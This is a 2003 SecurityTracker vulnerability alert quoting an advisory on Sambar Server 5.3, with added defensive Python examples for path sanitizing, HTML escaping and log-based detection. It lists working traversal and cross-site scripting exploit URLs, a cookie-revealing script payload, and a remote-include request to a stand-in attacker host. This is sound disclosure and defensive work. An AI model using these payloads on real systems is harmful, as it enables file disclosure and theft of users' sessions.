SecurityTracker.com
Category:  Application (Web Server/CGI)  >  Sambar Server Vendors:  Sambar Technologies
Sambar Server Input Validation Flaws Disclose Files on the System to Remote Users and Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1006390
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Mar 27 2003
Impact:  Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Advisory:  Security-Corp
Version(s): 5.3 and prior versions
Description:  Security Corporation reported several vulnerabilities in Sambar Server. A remote user can obtain information about the server environment, as well as the contents of directories and files on the system. A remote user can also conduct cross-site scripting attacks against Sambar Server users.

It is reported that the default installation includes the 'testcgi.exe' and 'environ.pl' scripts. A remote user can query these scripts to obtain information about the system environment, including the installation path:

http://[target]/cgi-bin/environ.pl
http://[target]/cgi-bin/testcgi.exe


A remote user can reportedly view directory contents and file contents by requesting the following type of URL:

http://[target]/sysuser/docmgr/iecreate.stm?template=../
http://[target]/sysuser/docmgr/ieedit.stm?url=../
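
The 'template' and 'url' values in the two requests above are used by iecreate.stm and ieedit.stm to locate a file, and a '../' component walks out of the directory the template was meant to read from. The Python below is an added example, not Sambar's code and not part of the advisory: it shows the canonicalize-then-check-prefix guard such a handler needs, covering percent-encoded and double-encoded dots, Windows backslashes, absolute paths and remote URLs. TEMPLATE_ROOT is a hypothetical directory placed under the C:/sambar53 install path that appears in the advisory's CGI output; the real docmgr layout is not documented on this page.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical template directory (assumption). The install root C:/sambar53
# is taken from the advisory output; the docmgr sub-path below is made up.
TEMPLATE_ROOT = "C:/sambar53/docs/sysuser/docmgr/templates"


def resolve_template(user_value, root=TEMPLATE_ROOT):
    """Map a 'template' / 'url' query value to a file inside root.

    Returns the canonical path, or None when the value must be refused.
    """
    if not user_value:
        return None
    # Decode twice: the server has usually decoded once before a template
    # sees the value, and a second pass catches double-encoded dots.
    value = unquote(unquote(user_value)).replace("\\", "/")
    if "\x00" in value or ":" in value or value.startswith("/"):
        # NUL byte, drive letter or scheme (http://...), or absolute path
        return None
    root = root.rstrip("/")
    # Canonicalize first, then compare against the root: checking for the
    # literal string '../' before normalization is easy to get wrong.
    resolved = posixpath.normpath(posixpath.join(root, value))
    if resolved == root:
        return None  # the directory itself, not a template file
    if not resolved.startswith(root + "/"):
        return None  # escaped the template directory
    return resolved


if __name__ == "__main__":
    # Constructed probe values; the first is the advisory's own '../'.
    for probe in ("../", "..%2F", "%252e%252e/", "..\\..\\boot.ini",
                  "http://203.0.113.5/hostile_file.htm", "report.stm"):
        print(repr(probe), "->", resolve_template(probe))
```

Only the last probe resolves; every other value, including the single '../' from the advisory, returns None. The prefix test must include the trailing separator so that a sibling directory with the same prefix (for example 'templates2') is not accepted.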

Numerous scripts on the server fail to filter HTML code from user-supplied input when displaying the input, according to the advisory. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running Sambar Server and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
http://[target]/netutils/whodata.stm?sitename=[hostile_code]
http://[target]/netutils/findata.stm?user=[hostile_code]
http://[target]/netutils/findata.stm?host=[hostile_code]
http://[target]/isapi/testisa.dll?check1=[hostile_code]
http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
http://[target]/cgi-bin/testcgi.exe?[hostile_code]
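
Every entry in the list above has the same shape: a query parameter is copied into the response page without being encoded for HTML, so markup in the parameter becomes part of the document. The Python below is an added example written for this entry, not code from Sambar or from the advisory. It models the ipdata.stm case with a hypothetical page template: the unsafe renderer reproduces the flaw class, the safe renderer escapes for the HTML text context, and the handler adds the second layer the advisory's "Input validation error" cause points at, an allow-list check that the 'ipaddr' parameter really is an IP address. PAGE, handle_ipdata and the parameter handling are assumptions about how such a template works.

```python
import html
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Hypothetical response template standing in for ipdata.stm (assumption).
PAGE = "<html><body><h2>Host data for {}</h2></body></html>"


def render_ipdata_unsafe(ipaddr):
    # The flaw class described in the advisory: the parameter value goes into
    # the page as-is, so a <script> element in it is parsed as part of the page.
    return PAGE.format(ipaddr)


def render_ipdata_safe(ipaddr):
    # Output encoding for the HTML text context. quote=True also turns ' and "
    # into entities, which matters if the value is ever placed in an attribute.
    return PAGE.format(html.escape(ipaddr, quote=True))


def validate_ipaddr(value):
    """Allow-list check: ipdata.stm only has a use for an IP address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def handle_ipdata(url):
    """Hardened handler: reject anything that is not an address, then escape.

    Returns (status, body). Escaping alone already prevents the injection;
    validation narrows the input to what the template actually needs.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    ipaddr = query.get("ipaddr", [""])[0]
    if not validate_ipaddr(ipaddr):
        return 400, PAGE.format("invalid address")
    return 200, render_ipdata_safe(ipaddr)


def contains_script_tag(document):
    """True when the rendered document still carries a live <script> tag."""
    return "<script" in document.lower()


if __name__ == "__main__":
    # The advisory's own demonstration payload, with [] replaced by <>.
    payload = '<script>alert("Cookie="+document.cookie)</script>'
    print("unsafe:", render_ipdata_unsafe(payload))
    print("safe:  ", render_ipdata_safe(payload))
    print(handle_ipdata("/netutils/ipdata.stm?ipaddr=192.0.2.10"))
```

The escaped output shows the payload as literal text (`&lt;script&gt;...`) and the browser never executes it; the same html.escape call is the fix for every text-context reflection in the list, while parameters that land inside attributes or script blocks need the encoding for that context instead.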

The vendor has reportedly been notified.

Impact:  A remote user can determine information about the system, including the installation path.

A remote user can view directory and file contents for directories and files that are readable by the web server.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running Sambar Server, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:  No solution was available at the time of this entry.
Vendor URL:  www.sambar.com/
Cause:  Access control error, Input validation error
Underlying OS:  Windows (Any)
Reported By:  "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corporation.com>
Message History:   None.
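
With no vendor fix available at the time of this entry, a defender's remaining options were to remove or restrict the default CGI scripts and the docmgr and netutils areas, and to watch the web server's access log for the request shapes listed in this entry. The Python below is an added example (not SecurityTracker's or Security Corporation's code) that scans access-log lines for those shapes: any hit on the two default CGI scripts, '../' components in a query to the reflecting endpoints, inline script markup, and a remote URL passed to the 'url' parameter. The log lines, addresses and timestamps are constructed for the example; the endpoint prefixes are taken from the URL list above.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Common Log Format lines (not real traffic). 203.0.113.5 is a
# documentation address standing in for the advisory's [attacker] host.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Mar/2003:15:26:45 +0100] "GET /index.htm HTTP/1.1" 200 1043
10.0.0.7 - - [27/Mar/2003:15:27:02 +0100] "GET /cgi-bin/environ.pl HTTP/1.1" 200 512
10.0.0.7 - - [27/Mar/2003:15:27:10 +0100] "GET /sysuser/docmgr/ieedit.stm?url=../ HTTP/1.1" 200 2210
10.0.0.9 - - [27/Mar/2003:15:28:31 +0100] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640
10.0.0.9 - - [27/Mar/2003:15:29:00 +0100] "GET /sysuser/docmgr/ieedit.stm?url=http://203.0.113.5/hostile_file.htm HTTP/1.1" 200 900
10.0.0.3 - - [27/Mar/2003:15:30:12 +0100] "GET /sysuser/docmgr/search.stm?query=budget HTTP/1.1" 200 300
10.0.0.9 - - [27/Mar/2003:15:31:40 +0100] "GET /cgi-bin/testcgi.exe?%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints from this entry. The two default CGI scripts disclose environment
# data on any request; the rest are flagged only when the query carries a payload.
DEFAULT_CGI = {"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"}
REFLECTING_PREFIXES = ("/sysuser/docmgr/", "/netutils/", "/syshelp/", "/wwwping/",
                       "/isapi/testisa.dll", "/samples/search.dll", "/cgi-bin/")
TRAVERSAL_RE = re.compile(r"(?<!\.)\.\.(?:[/\\]|$)")
SCRIPT_RE = re.compile(r"<\s*/?\s*(?:script|img|iframe|svg|object)\b|javascript:", re.I)
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def classify_request(target):
    """Return the list of indicator names matched by one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = unquote(unquote(parts.query))  # second pass catches double encoding
    findings = []
    if path in DEFAULT_CGI:
        findings.append("default-cgi-info-disclosure")
    if path.startswith(REFLECTING_PREFIXES) and query:
        if TRAVERSAL_RE.search(query):
            findings.append("path-traversal")
        if SCRIPT_RE.search(query):
            findings.append("reflected-xss")
        for param in query.split("&"):
            name, _, value = param.partition("=")
            if name == "url" and REMOTE_URL_RE.match(value):
                findings.append("remote-template-include")
    return findings


def scan_log(text):
    """Parse CLF lines and return (client ip, target, findings) for each hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


def summarize(hits):
    """Count hits per client address, to rank sources for follow-up."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, target, findings in found:
        print(ip, target, ", ".join(findings))
    print(summarize(found))
```

The scan flags five of the seven constructed lines and leaves the ordinary search request alone. A request to environ.pl or testcgi.exe from outside the administrative network is worth an alert on its own, since those scripts have no purpose for ordinary visitors; the query-based rules are heuristics and will need tuning against the real parameter names in use.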


 Source Message Contents

Date:  Thu, 27 Mar 2003 15:26:45 +0100
From:  "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corporation.com>
Subject:  [SCSA-012] Multiple vulnerabilities in Sambar Server

 

________________________________________________________________________

Security Corporation Security Advisory [SCSA-012]
________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000,
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net)


DETAILS & EXPLOITS
________________________________________________________________________


¤ Path Disclosure :

Sambar's default installation of the CGI bin directory contains
a testcgi.exe and an environ.pl that allow remote users to view
information regarding the operating system and the
web server's directory.

These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.


- Exploits :

http://[target]/cgi-bin/environ.pl

http://[target]/cgi-bin/testcgi.exe


Will produce the following output:

- environ.pl :
--------------

Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:


- testcgi.exe :
---------------

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE

----------------------------


¤ Directory Disclosure :

Other security vulnerabilities were found in Sambar which allow an
attacker to reveal the contents of files and directories
on the web server, even if they should not be revealed.

These vulnerabilities can simply be exploited by requesting a
specially crafted URL utilizing the iecreate.stm and ieedit.stm
applications with '../' appended.

- Exploits :

http://[target]/sysuser/docmgr/iecreate.stm?template=../

http://[target]/sysuser/docmgr/ieedit.stm?url=../


----------------------------


¤ Cross Site Scripting :

Many exploitable bugs were found in Sambar Server which cause script
execution on the client's computer when following a crafted URL.

This kind of attack, known as a "Cross-Site Scripting Vulnerability", is
present in many sections of the web site; an attacker can input
specially crafted links and/or other malicious scripts.

- Exploits :

http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

http://[target]/netutils/whodata.stm?sitename=[hostile_code]

http://[target]/netutils/findata.stm?user=[hostile_code]

http://[target]/netutils/findata.stm?host=[hostile_code]

http://[target]/isapi/testisa.dll?check1=[hostile_code]

http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

http://[target]/cgi-bin/testcgi.exe?[hostile_code]


- Another Cross Site Scripting can be exploited with a
remote file which includes the hostile code, like this:

http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm


The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(opens a window with the visitor's cookie.)

(replace [] by <>)


SOLUTIONS
________________________________________________________________________

No solution for the moment.


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________

- http://www.security-corp.org/index.php?ink=4-15-1

- French version:
http://www.security-corporation.com/index.php?id=advisories&a=012-FR


------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
------------------------------------------------------------------------


 



Copyright 2002, SecurityGlobal.net LLC